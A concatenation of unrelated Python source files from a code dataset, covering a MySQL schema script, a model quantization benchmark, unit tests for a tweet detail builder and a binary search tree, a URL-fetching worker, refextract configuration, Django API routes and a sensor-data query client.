INDEX `fk_TR_CONTRAT_CTT_1_idx` (`AUT_ID` ASC),
INDEX `fk_TR_CONTRATBENEFICIAIRE_CTT_TE_PERSONNE_PRS1_idx` (`PRS_ID` ASC),
CONSTRAINT `fk_TR_CONTRAT_CTT_1`
FOREIGN KEY (`AUT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_AUTONOMIE_AUT` (`AUT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS1`
FOREIGN KEY (`PRS_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_BENEFICIAIRE_CTT Table created successfully')
# Interventions carried out for a beneficiary contract.
# BUG FIX: the first FK referenced `TR_TYPEINTERVENTION_TPI` (missing
# underscores), but the table is created above as `T_R_TYPEINTERVENTION_TPI`.
# Because FOREIGN_KEY_CHECKS is disabled during the rebuild, the typo is not
# caught at CREATE time and only surfaces later as a broken constraint.
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (
  `INT_ID` INT NOT NULL AUTO_INCREMENT,
  `ADR_ID` INT NOT NULL,
  `INT_DATEINTERVENTION` DATE NOT NULL,
  `INT_PRESENCEANIMALMOYEN` TINYINT(1) NOT NULL DEFAULT 0,
  `NOTES` VARCHAR(300) NULL,
  `CTT_ID` INT NOT NULL,
  `TPI_ID` INT NOT NULL,
  PRIMARY KEY (`INT_ID`),
  INDEX `fk_TR_INTERVENTION_INT_1_idx` (`TPI_ID` ASC),
  INDEX `fk_TR_INTERVENTION_INT_2_idx` (`CTT_ID` ASC),
  CONSTRAINT `fk_TR_INTERVENTION_INT_1`
    FOREIGN KEY (`TPI_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_R_TYPEINTERVENTION_TPI` (`TPI_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TR_INTERVENTION_INT_2`
    FOREIGN KEY (`CTT_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_INTERVENTION_INT Table created successfully')
##############
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_INTERCONNEXION_INTCO` (
`INTCO_ID` INT NOT NULL AUTO_INCREMENT,
`DATEEVENEMENT` DATETIME(6) NOT NULL,
`VALEUR` VARCHAR(45) NOT NULL,
`PDT_ID` INT NOT NULL,
`INTCO_ADRESSEIP` VARCHAR(20) NOT NULL,
PRIMARY KEY (`INTCO_ID`),
INDEX `fk_TR_COMMUNICATION_COM_1_idx` (`PDT_ID` ASC),
CONSTRAINT `fk_TR_COMMUNICATION_COM_1`
FOREIGN KEY (`PDT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_R_INTERCONNEXION_INTCO Table created successfully')
# Junction table linking contract, address, product and intervention.
# BUG FIX: constraint 2 referenced `TE_LOCALISATIONPRODUIT_LOC` (missing
# underscores), but the table is created above as
# `T_E_LOCALISATIONPRODUIT_LOC`.  With FOREIGN_KEY_CHECKS=0 the typo is
# accepted at CREATE time and breaks only when the FK is actually used.
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_CTT_ADR_PDT_INT` (
  `PDT_SERIALNUMBER` INT NOT NULL,
  `INT_ID` INT NOT NULL,
  `NOTES` VARCHAR(300) NULL,
  `LOC_ID` INT NOT NULL,
  `CTT_ID` INT NOT NULL,
  `ADR_ID` INT NOT NULL,
  INDEX `fk_TJ_CTT_ADR_PDT_INT_2_idx` (`LOC_ID` ASC),
  INDEX `fk_TJ_CTT_ADR_PDT_INT_3_idx` (`PDT_SERIALNUMBER` ASC),
  INDEX `fk_TJ_CTT_ADR_PDT_INT_4_idx` (`INT_ID` ASC),
  INDEX `fk_TJ_CTT_ADR_PDT_INT_5_idx` (`CTT_ID` ASC),
  INDEX `fk_TJ_CTT_ADR_PDT_INT_1_idx` (`ADR_ID` ASC),
  CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_2`
    FOREIGN KEY (`LOC_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_LOCALISATIONPRODUIT_LOC` (`LOC_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_3`
    FOREIGN KEY (`PDT_SERIALNUMBER`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (`PDT_SERIALNUMBER`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_4`
    FOREIGN KEY (`INT_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_5`
    FOREIGN KEY (`CTT_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_R_BENEFICIAIRE_CTT` (`CTT_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TJ_CTT_ADR_PDT_INT_1`
    FOREIGN KEY (`ADR_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (`ADR_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print("table jointure T_J_CTT_ADR_PDT_INT créée ")
    # Legal entities (companies), identified by their SIREN number.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (
  `PEM_NUMEROSIREN` INT NOT NULL,
  `PEM_RAISONSOCIALE` VARCHAR(45) NOT NULL,
  `PEM_TYPEACTIVITE` VARCHAR(60) NOT NULL,
  `PEM_SIRET` VARCHAR(45) NULL,
  PRIMARY KEY (`PEM_NUMEROSIREN`),
  INDEX `index2` (`PEM_RAISONSOCIALE` ASC))
ENGINE = InnoDB;""")
    print('T_E_PERSONNEMORALE_PEM créée')
    # Junction: employee (person) <-> employer (company) <-> intervention.
    cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` ;""")
    cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_J_EMPLOYE_EMP` (
  `EMP_ID` INT NOT NULL,
  `PEM_ID` INT NOT NULL,
  `INT_ID` INT NOT NULL,
  `EMP_TELEPHONE` CHAR(15) NOT NULL,
  `EMP_EMAIL` VARCHAR(45) NOT NULL,
  INDEX `fk_TE_PRESTATAIRE_PREST_2_idx` (`PEM_ID` ASC),
  INDEX `fk_TE_PRESTATAIRE_PREST_3_idx` (`INT_ID` ASC),
  CONSTRAINT `fk_TE_PRESTATAIRE_PREST_1`
    FOREIGN KEY (`EMP_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (`PRS_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TE_PRESTATAIRE_PREST_2`
    FOREIGN KEY (`PEM_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_PERSONNEMORALE_PEM` (`PEM_NUMEROSIREN`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION,
  CONSTRAINT `fk_TE_PRESTATAIRE_PREST_3`
    FOREIGN KEY (`INT_ID`)
    REFERENCES `OBJETDOMO_V13_1.1`.`T_E_INTERVENTION_INT` (`INT_ID`)
    ON DELETE NO ACTION
    ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
    print('T_J_EMPLOYE_EMP Table created successfully')
    # Restore the session flags saved before the rebuild.
    cursor.execute("""SET SQL_MODE=@OLD_SQL_MODE;""")
    cursor.execute("""SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;""")
    cursor.execute("""SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;""")
except mysql.connector.Error as error:
    print("Failed to create table in MySQL: {}".format(error))
finally:
    # Always release the cursor and the connection, even after a failure.
    if (connection.is_connected()):
        cursor.close()
        connection.close()
        print("MySQL connection is closed")
| StarcoderdataPython |
1615887 | """
A quantized model executes some or all of the operations with integers rather than floating point values. This allows for a more compact models and the use of high performance vectorized operations on many hardware platforms.
As a result, you get about 40% smaller and faster models. The speed-up depends on your CPU and how PyTorch was build and can be anywhere between 10% speed-up and 300% speed-up.
Note: Quantized models are only available for CPUs. Use a GPU, if available, for optimal performance.
For more details:
https://pytorch.org/docs/stable/quantization.html
"""
import logging
import os
import torch
from sentence_transformers import LoggingHandler, SentenceTransformer, util, InputExample
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator
from torch.nn import Embedding, Linear
from torch.quantization import quantize_dynamic
import gzip
import csv
import time
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
#Check if dataset exsist. If not, download and extract it
sts_dataset_path = 'datasets/stsbenchmark.tsv.gz'
if not os.path.exists(sts_dataset_path):
util.http_get('https://sbert.net/datasets/stsbenchmark.tsv.gz', sts_dataset_path)
#Limit torch to 4 threads
torch.set_num_threads(4)
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO)
### /print debug information to stdout
model_name = 'all-distilroberta-v1'
# Load a named sentence model (based on BERT). This will download the model from our server.
# Alternatively, you can also pass a filepath to SentenceTransformer()
model = SentenceTransformer(model_name, device='cpu')
q_model = quantize_dynamic(model, {Linear, Embedding})
# Convert the dataset to a DataLoader ready for training
logging.info("Read STSbenchmark dataset")
test_samples = []
sentences = []
with gzip.open(sts_dataset_path, 'rt', encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_NONE)
for row in reader:
score = float(row['score']) / 5.0 # Normalize score to range 0 ... 1
inp_example = InputExample(texts=[row['sentence1'], row['sentence2']], label=score)
sentences.append(row['sentence1'])
sentences.append(row['sentence2'])
if row['split'] == 'test':
test_samples.append(inp_example)
sentences = sentences[0:10000]
logging.info("Evaluating speed of unquantized model")
start_time = time.time()
emb = model.encode(sentences, show_progress_bar=True)
diff_normal = time.time() - start_time
logging.info("Done after {:.2f} sec. {:.2f} sentences / sec".format(diff_normal, len(sentences) / diff_normal))
logging.info("Evaluating speed of quantized model")
start_time = time.time()
emb = q_model.encode(sentences, show_progress_bar=True)
diff_quantized = time.time() - start_time
logging.info("Done after {:.2f} sec. {:.2f} sentences / sec".format(diff_quantized, len(sentences) / diff_quantized))
logging.info("Speed-up: {:.2f}".format(diff_normal / diff_quantized))
#########
evaluator = EmbeddingSimilarityEvaluator.from_input_examples(test_samples, name='sts-test')
logging.info("Evaluate regular model")
model.evaluate(evaluator)
print("\n\n")
logging.info("Evaluate quantized model")
q_model.evaluate(evaluator)
| StarcoderdataPython |
121157 | <filename>tests/twitter_learning_journal/builders/test_detail_builder.py<gh_stars>1-10
from pytest import mark
from app.twitter_learning_journal.builders.detail_builder import DetailBuilder
from app.twitter_learning_journal.models.tweet import Tweet
def test_detail_builder_init():
    """The constructor stores the tweet and defaults the detail type to 'blog'."""
    source = Tweet()
    builder = DetailBuilder(source)
    assert source == builder.tweet
    assert 'blog' == builder.default_detail_type
def test_build_details():
    """build() copies the tweet's data onto the resulting detail record."""
    title_line = 'full_text'

    source = Tweet(id=1,
                   full_text=f'{title_line}\ntest',
                   urls='urls',
                   classification='classification')
    builder = DetailBuilder(source)

    detail = builder.build()

    assert title_line == detail.title
    assert source.id == detail.tweet_id
    assert source.urls == detail.url
    assert 'blog' == detail.type
    assert not detail.is_fully_classified
    assert source.classification == detail.classification
    assert builder.default_detail_size == detail.count
@mark.parametrize('expected_title, full_text', [
    ('hello', 'hello\nsometest'),
    ('sometest', '\nsometest'),
    ('', ''),
    ('123456789112345678921234567893', '123456789112345678921234567893XXX'),
    ('candace', '\n\n\ncandace\nsome text'),
])
def test_title(expected_title, full_text):
    """title is taken from the first non-empty line, capped at 30 characters."""
    builder = DetailBuilder(Tweet(full_text=full_text))
    assert expected_title == builder.title
| StarcoderdataPython |
1677706 | import shutil
import requests
from projects.workers.base import Worker
from projects.workers.exceptions import *
class FetchURL(Worker):
    """Worker that downloads the content of a URL over HTTP GET."""

    id = 'fetch_url'
    name = 'fetch_url'
    image = ''
    description = """
    Fetch URL Content. Limitations:

    1. Uses HTTP GET Method
    2. Max of 3 redirects
    3. Max file size is 10Megabytes
    """
    schema = {
        "type": "object",
        "properties": {
            "in": {
                "type": "string",
                "format": "url",
                "description": "URL to fetch content from"
            },
            "out": {
                "type": [
                    "string",
                    "null"
                ],
                "description": "URL content"
            }
        }
    }

    def process(self, data):
        """Fetch *data* (a URL) and return its body as text.

        Raises WorkerNoInputException when the endpoint does not allow GET
        or advertises a Content-Length above the 10 MB limit.
        """
        session = requests.Session()
        session.max_redirects = 3
        # ~10 Megabytes
        max_file_size = 10000000

        # OPTIONS request: make sure GET is allowed.
        # BUG FIX: the Allow header may be absent, in which case .get()
        # returned None and `'GET' not in None` raised TypeError; default to
        # an empty string so a missing header is treated as "GET not allowed".
        options = session.options(data)
        if 'GET' not in options.headers.get('Allow', ''):
            raise WorkerNoInputException(
                'Remote endpoint has no GET in Options'
            )

        # HEAD request: reject bodies that declare a size above the limit.
        # Endpoints that omit Content-Length are allowed through (default 0).
        head = session.head(data)
        if int(head.headers.get('Content-Length', 0)) > max_file_size:
            raise WorkerNoInputException(
                'Remote endpoint response size exceeds 10 Megabytes'
            )

        response = session.get(data)
        response.raise_for_status()
        return response.text
| StarcoderdataPython |
3380474 | from custom_envs.pybulletgym_custom.envs import register # this is included to trigger env loading | StarcoderdataPython |
1607528 | <filename>shop_app/utils/__init__.py
# -*- coding: utf-8 -*-
# @Time : 2020/10/27 下午1:47
# @Author : 司云中
# @File : __init__.py.py
# @Software: Pycharm | StarcoderdataPython |
3272879 | import os
import hypertune
import tensorflow as tf
class HypertuneHook(tf.train.SessionRunHook):
    """Session hook that reports the final top-5 accuracy to CloudML hypertune."""

    def __init__(self):
        # Metric tag and trial id are provided by the CloudML environment.
        self.hypertune = hypertune.HyperTune()
        self.hp_metric_tag = os.environ.get('CLOUD_ML_HP_METRIC_TAG', '')
        self.trial_id = os.environ.get('CLOUD_ML_TRIAL_ID', 0)

    def end(self, session):
        """Evaluate the metric tensor once at session end and report it."""
        step_tensors = session.graph.get_collection('global_step')
        global_step = session.run(step_tensors)[0]
        tf.logging.info('HypertuneHook called, tag: {}, trial_id: {}, global_step: {}'.format(self.hp_metric_tag, self.trial_id, global_step))
        # The name of the tensor is given in metric_fn in resnet_main_hypertune.py.
        accuracy_tensor = session.graph.get_tensor_by_name('top_5_accuracy/value:0')
        accuracy = session.run(accuracy_tensor)
        self.hypertune.report_hyperparameter_tuning_metric(
            hyperparameter_metric_tag=self.hp_metric_tag,
            metric_value=accuracy,
            global_step=global_step)
| StarcoderdataPython |
1692689 | <filename>Data-Structures/tree/test_tree.py
from tree import _Node, BinaryTree, BinarySearchTree, Queue
import pytest
@pytest.fixture
def my_bst():
    """Nine-node BinarySearchTree fixture rooted at 15."""
    tree = BinarySearchTree()
    tree.add(15)
    tree.add(11)
    tree.add(13)
    tree.add(7)
    tree.add(8)
    tree.add(5)
    tree.add(19)
    tree.add(17)
    tree.add(23)
    return tree
def test_tree_instance():
    """A fresh BinaryTree starts with no root."""
    tree = BinaryTree()
    assert tree._root is None
def test_tree_one_member():
    """The first added value becomes the root."""
    tree = BinarySearchTree()
    tree.add('apples')
    assert tree._root.value == 'apples'
def test_add_three_members():
    """Smaller values go left of the root, larger values go right."""
    tree = BinarySearchTree()
    tree.add(10)
    tree.add(5)
    tree.add(15)
    assert tree._root.value == 10
    assert tree._root.left.value == 5
    assert tree._root.right.value == 15
def test_add_more_members_for_balanced():
    """BST ordering holds two levels deep for a balanced insertion order."""
    tree = BinarySearchTree()
    tree.add(15)
    tree.add(11)
    tree.add(13)
    tree.add(7)
    tree.add(25)
    tree.add(60)
    tree.add(23)
    assert tree._root.value == 15
    assert tree._root.left.value == 11
    assert tree._root.right.value == 25
    assert tree._root.left.left.value == 7
    assert tree._root.left.right.value == 13
    assert tree._root.right.right.value == 60
    assert tree._root.right.left.value == 23
def test_add_more_members_for_imbalanced(my_bst):
    """Left-heavy chains keep BST ordering down to the third level."""
    assert my_bst._root.value == 15
    assert my_bst._root.left.value == 11
    assert my_bst._root.left.right.value == 13
    assert my_bst._root.left.left.value == 7
    assert my_bst._root.left.left.left.value == 5
    assert my_bst._root.left.left.right.value == 8
def test_add_one_node():
    """A single-node tree has a value at the root and no children."""
    tree = BinarySearchTree()
    tree.add(20)
    assert tree._root.value == 20
    assert tree._root.left == None
    assert tree._root.right == None
def test_check_one_node_tree():
    """contains() finds the only value in a single-node tree and rejects others."""
    tree = BinarySearchTree()
    tree.add(20)
    # Assert truthiness directly instead of comparing to True/False (PEP 8 / E712).
    assert tree.contains(20)
    assert not tree.contains(21)
def test_contains_true(my_bst):
    """contains() reports membership correctly on the populated fixture."""
    assert my_bst._root.value == 15
    # Assert truthiness directly instead of comparing to True/False (PEP 8 / E712).
    assert my_bst.contains(7)
    assert not my_bst.contains(9)
def test_pre_order(my_bst):
    """Pre-order traversal visits root, then left subtree, then right."""
    assert my_bst.pre_order() == [15, 11, 7, 5, 8, 13, 19, 17, 23]
def test_pre_order_one():
    """Pre-order traversal of a single-node tree is just that value."""
    tree_one = BinarySearchTree()
    tree_one.add(20)
    assert tree_one.pre_order() == [20]
def test_in_order(my_bst):
    """In-order traversal of a BST yields the values sorted ascending."""
    assert my_bst.in_order() == [5, 7, 8, 11, 13, 15, 17, 19, 23]
def test_post_order(my_bst):
    """Post-order traversal visits children before their parent, root last."""
    assert my_bst.post_order() == [5, 8, 7, 13, 11, 17, 23, 19, 15]
def test_breadth_first_binarysearch(my_bst):
    """Breadth-first traversal returns values level by level, left to right."""
    assert BinaryTree.breadth_first(my_bst) == [15, 11, 19, 7, 13, 17, 23, 5, 8]
def test_breadth_first_binarytree_empty():
    """Breadth-first traversal of an empty tree is an empty list."""
    tree = BinaryTree()
    assert BinaryTree.breadth_first(tree) == []
def test_breadth_first_binarytree_one_element():
    """Breadth-first traversal of a one-node tree yields just the root value."""
    tree = BinaryTree()
    tree._root = _Node(8)
    assert BinaryTree.breadth_first(tree) == [8]
def test_breadth_first_binarytree_with_letters():
    """Breadth-first traversal handles mixed value types (built by hand, not a BST)."""
    tree = BinaryTree()
    tree._root = _Node(8)
    tree._root.left = _Node("a")
    tree._root.right = _Node(-2)
    assert BinaryTree.breadth_first(tree) == [8, "a", -2]
    tree._root.left.left = _Node(195)
    tree._root.left.right = _Node("cat")
    tree._root.right.right = _Node(8)
    tree._root.left.left.left = _Node(-0.56)
    tree._root.left.left.right = _Node(9)
    tree._root.right.right.right = _Node(23)
    tree._root.right.right.right.left = _Node([5, 7])
    assert BinaryTree.breadth_first(tree) == [8, "a", -2, 195, "cat", 8, -0.56, 9, 23, [5, 7]]
| StarcoderdataPython |
3385172 | <filename>venv_biblio_v1/lib/python2.7/site-packages/refextract/references/config.py
# -*- coding: utf-8 -*-
#
# This file is part of refextract.
# Copyright (C) 2005, 2006, 2007, 2008, 2010, 2011, 2015, 2016 CERN.
#
# refextract is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# refextract is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with refextract; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
"""refextract configuration."""
from __future__ import unicode_literals
import os
try:
from shutil import which
except ImportError:
# CPython <3.3
from distutils.spawn import find_executable as which
import pkg_resources
# Version number:
CFG_PATH_GFILE = os.environ.get('CFG_PATH_GFILE', which('file'))
CFG_PATH_PDFTOTEXT = os.environ.get('CFG_PATH_PDFTOTEXT', which('pdftotext'))
# Module config directory
CFG_KBS_DIR = pkg_resources.resource_filename('refextract.references', 'kbs')
CFG_REFEXTRACT_KBS = {
'journals': "%s/journal-titles.kb" % CFG_KBS_DIR,
'journals-re': "%s/journal-titles-re.kb" % CFG_KBS_DIR,
'report-numbers': "%s/report-numbers.kb" % CFG_KBS_DIR,
'authors': "%s/authors.kb" % CFG_KBS_DIR,
'collaborations': "%s/collaborations.kb" % CFG_KBS_DIR,
'books': "%s/books.kb" % CFG_KBS_DIR,
'conferences': "%s/conferences.kb" % CFG_KBS_DIR,
'publishers': "%s/publishers.kb" % CFG_KBS_DIR,
'special-journals': "%s/special-journals.kb" % CFG_KBS_DIR,
}
# Reference fields:
CFG_REFEXTRACT_FIELDS = {
'misc': 'm',
'linemarker': 'o',
'doi': 'a',
'hdl': 'a',
'reportnumber': 'r',
'journal': 's',
'url': 'u',
'urldesc': 'z',
'author': 'h',
'title': 't',
'isbn': 'i',
'publisher': 'p',
'year': 'y',
'collaboration': 'c',
'recid': '0',
}
# Internal tags are used by refextract to mark-up recognised citation
# information.
CFG_REFEXTRACT_MARKER_OPENING_REPORT_NUM = r"<cds.REPORTNUMBER>"
CFG_REFEXTRACT_MARKER_OPENING_TITLE = r"<cds.JOURNAL>"
CFG_REFEXTRACT_MARKER_OPENING_TITLE_IBID = r"<cds.JOURNALibid>"
CFG_REFEXTRACT_MARKER_OPENING_SERIES = r"<cds.SER>"
CFG_REFEXTRACT_MARKER_OPENING_VOLUME = r"<cds.VOL>"
CFG_REFEXTRACT_MARKER_OPENING_YEAR = r"<cds.YR>"
CFG_REFEXTRACT_MARKER_OPENING_PAGE = r"<cds.PG>"
CFG_REFEXTRACT_MARKER_OPENING_QUOTED = r"<cds.QUOTED>"
CFG_REFEXTRACT_MARKER_OPENING_ISBN = r"<cds.ISBN>"
CFG_REFEXTRACT_MARKER_OPENING_PUBLISHER = r"<cds.PUBLISHER>"
CFG_REFEXTRACT_MARKER_OPENING_COLLABORATION = r"<cds.COLLABORATION>"
# These are the "closing tags:
CFG_REFEXTRACT_MARKER_CLOSING_REPORT_NUM = r"</cds.REPORTNUMBER>"
CFG_REFEXTRACT_MARKER_CLOSING_TITLE = r"</cds.JOURNAL>"
CFG_REFEXTRACT_MARKER_CLOSING_TITLE_IBID = r"</cds.JOURNALibid>"
CFG_REFEXTRACT_MARKER_CLOSING_SERIES = r"</cds.SER>"
CFG_REFEXTRACT_MARKER_CLOSING_VOLUME = r"</cds.VOL>"
CFG_REFEXTRACT_MARKER_CLOSING_YEAR = r"</cds.YR>"
CFG_REFEXTRACT_MARKER_CLOSING_PAGE = r"</cds.PG>"
CFG_REFEXTRACT_MARKER_CLOSING_QUOTED = r"</cds.QUOTED>"
CFG_REFEXTRACT_MARKER_CLOSING_ISBN = r"</cds.ISBN>"
CFG_REFEXTRACT_MARKER_CLOSING_PUBLISHER = r"</cds.PUBLISHER>"
CFG_REFEXTRACT_MARKER_CLOSING_COLLABORATION = r"</cds.COLLABORATION>"
# Of the form '</cds.AUTHxxxx>' only
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_STND = r"</cds.AUTHstnd>"
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_ETAL = r"</cds.AUTHetal>"
CFG_REFEXTRACT_MARKER_CLOSING_AUTHOR_INCL = r"</cds.AUTHincl>"
# The minimum length of a reference's misc text to be deemed insignificant.
# when comparing misc text with semi-colon defined sub-references.
# Values higher than this value reflect meaningful misc text.
# Hence, upon finding a correct semi-colon, but having current misc text
# length less than this value (without other meaningful reference objects:
# report numbers, titles...) then no split will occur.
# (A higher value will increase splitting strictness. i.e. Fewer splits)
CGF_REFEXTRACT_SEMI_COLON_MISC_TEXT_SENSITIVITY = 60
# The length of misc text between two adjacent authors which is
# deemed as insignificant. As such, when misc text of a length less
# than this value is found, then the latter author group is dumped into misc.
# (A higher value will increase splitting strictness. i.e. Fewer splits)
CGF_REFEXTRACT_ADJACENT_AUTH_MISC_SEPARATION = 10
# Maximum number of lines for a citation before it is considered invalid
CFG_REFEXTRACT_MAX_LINES = 25
| StarcoderdataPython |
175583 | from django.urls import path, include
from rest_framework import routers
from catalogue.api.views import (
ProductViewSet,
ProductCategoryViewSet,
MediaUploadViewSet,
AttributeGroupViewSet,
ProductAttributeViewSet,
ProductAttributeValueViewSet,
ProductStockViewSet,
)
router = routers.DefaultRouter()
router.register(r"products", ProductViewSet, "products")
router.register(
r"product-categories", ProductCategoryViewSet, "product_categories"
)
router.register(r"media-uploads", MediaUploadViewSet, "media_uploads")
router.register(r"attribute-groups", AttributeGroupViewSet, "attribute_groups")
router.register(
r"product-attributes", ProductAttributeViewSet, "product_attributes"
)
router.register(
r"product-attribute-values",
ProductAttributeValueViewSet,
"product_attribute_values",
)
router.register(r"product-stock", ProductStockViewSet, "product_stock")
urlpatterns = [path("", include(router.urls))]
| StarcoderdataPython |
16126 | import datetime
import os, sys
import pprint
import requests
from pandas.io.json import json_normalize
import pandas as pd
URL = 'https://wsn.latice.eu/api/query/v2/'
#URL = 'http://localhost:8000/wsn/api/query/v2/'
#TOKEN = os.getenv('WSN_TOKEN')
TOKEN = os.getenv('WSN_TOKEN')
path = os.getcwd()
def query(
limit=100, # Pagination
fields=None, # Fields to return (all by default)
tags=None, # Tags to return (all by default)
interval=None, # If given will return the average in the interval
debug=False, # Not sent to the API
# Filters
time__gte=None, time__lte=None, # Time is special
**kw):
# Parameters
if time__gte:
time__gte = time__gte.timestamp()
if time__lte:
time__lte = time__lte.timestamp()
params = {
'limit': limit, # Pagination
'time__gte': time__gte, 'time__lte': time__lte, # Time filter
'fields': fields,
'tags': tags,
'interval': interval,
}
# Filter inside json
for key, value in kw.items():
if value is None:
params[key] = None
continue
if type(value) is datetime.datetime:
value = int(value.timestamp())
if isinstance(value, int):
key += ':int'
params[key] = value
# Query
headers = {'Authorization': 'Token %s' % TOKEN}
response = requests.get(URL, headers=headers, params=params)
response.raise_for_status()
json = response.json()
# Debug
if debug:
pprint.pprint(params)
pprint.pprint(json)
print()
return json
def get_token():
try:
token = os.environ['WSN_TOKEN']
return token
except KeyError:
print("Please set the environment variable WSN_TOKEN in .bashrc as follow: \n\t export WSN_TOKEN=xxxxxxxxxxxxxxxxx ")
sys.exit(1)
def query_df(
limit=100, # Pagination
fields=None, # Fields to return (all by default)
tags=None, # Tags to return (all by default)
interval=None, # If given will return the average in the interval
debug=False, # Not sent to the API
# Filters
time__gte=None, time__lte=None, # Time is special
**kw):
# Parameters
if time__gte:
time__gte = time__gte.timestamp()
if time__lte:
time__lte = time__lte.timestamp()
params = {
'limit': limit, # Pagination
'time__gte': time__gte, 'time__lte': time__lte, # Time filter
'fields': fields,
'tags': tags,
'interval': interval,
}
# Filter inside json
for key, value in kw.items():
if value is None:
params[key] = None
continue
if type(value) is datetime.datetime:
value = int(value.timestamp())
if isinstance(value, int):
key += ':int'
params[key] = value
# Query
headers = {'Authorization': 'Token %s' % TOKEN}
response = requests.get(URL, headers=headers, params=params)
response.raise_for_status()
json = response.json()
# Debug
if debug:
pprint.pprint(params)
pprint.pprint(json)
print()
df = json_normalize(json['results']) # convert json object to pandas dataframe
try:
df.time = pd.to_datetime(df.time)
except:
print('WARNING: no timestamp')
return df
def biomet_metadata():
    """Load the FINSE biomet stationary-variables metadata as a DataFrame.

    The CSV lives in the module-level data directory ``path`` and uses
    semicolon separators.
    """
    csv_file = path + '/FINSE-stationary_variables_biomet.csv'
    return pd.read_csv(csv_file, sep=';')
if __name__ == '__main__':
    # We need an authentication token
    # NOTE(review): os.getenv returns None when unset, whereas get_token()
    # above exits with an explanation — consider using get_token() here.
    TOKEN = os.getenv('WSN_TOKEN')
    # Number of elements to return in every query
    limit = 100
    # Example 1: Get all the fields and tags of a given mote from a given time.
    # This is good to explore the data, but bad on performance.
    response = query(limit=limit,
                     serial=0x1F566F057C105487,
                     time__gte=datetime.datetime(2017, 11, 15),
                     debug=True,
    )
    # Example 2: Get the RSSI of an Xbee module identified by its address
    print('==============================================')
    response = query(limit=limit,
                     source_addr_long=0x0013A2004105D4B6,
                     fields=['rssi'],
                     debug=True,
    )
    # Example 3: Get the battery and internal temperature from all motes,
    # include the serial tag to tell them apart.
